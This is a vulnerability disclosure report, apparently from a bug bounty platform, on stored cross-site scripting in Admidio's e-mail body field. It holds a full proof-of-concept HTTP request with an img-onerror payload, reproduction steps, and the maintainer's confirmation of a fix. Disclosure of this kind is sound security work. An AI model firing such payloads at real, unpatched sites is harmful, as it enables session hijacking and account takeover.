Cross-site Scripting (XSS) - Stored in admidio/admidio

Valid

Reported on

Sep 28th 2021


Description

Stored XSS in parameter 'msg_body' at 'Write e-mail' allows for the arbitrary execution of JavaScript

Proof of Concept

// PoC.req
POST /demo/adm_program/modules/messages/messages_send.php HTTP/2
Host: www.admidio.org
Cookie: ADMIDIO_DEMO_d00c3e23_demo_SESSION_ID=93c01fc78b67c3dd8e8ce86ae139a396; 'ADMIDIO_DEMO_d00c3e23_demo_cookieconsent_status=dismiss
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------23765900513111934937891624423
Content-Length: 720
Origin: https://www.admidio.org
Referer: https://www.admidio.org/demo/adm_program/modules/messages/messages_write.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="msg_to[]"

groupID: 4
-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="subject"

test
-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1048576
-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="msg_body"

<p>&lt;iMg SrC=&quot;x&quot; oNeRRor=&quot;alert(1);&quot;&gt;</p>

-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="btn_send"


-----------------------------23765900513111934937891624423--

Step to Reproduct

Goto News > Write e-email

At body input with payload: <iMg SrC="x" oNeRRor="alert(1);">

The XSS will trigger when open detail e-mail

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the admidio team and are waiting to hear back 4 months ago
admidio/admidio maintainer validated this vulnerability 4 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
admidio/admidio maintainer
4 months ago

Maintainer


The problem is solved within the current master. If I solve the csrf within the forms we will release version 4.1 which will adresse this issue.

lethanhphuc
4 months ago

Researcher


Oke. I waiting for the new version from you

Markus Faßbender confirmed that a fix has been merged on eec453 18 days ago
Markus Faßbender has been awarded the fix bounty
Markus
18 days ago

Maintainer


Thanks for the research.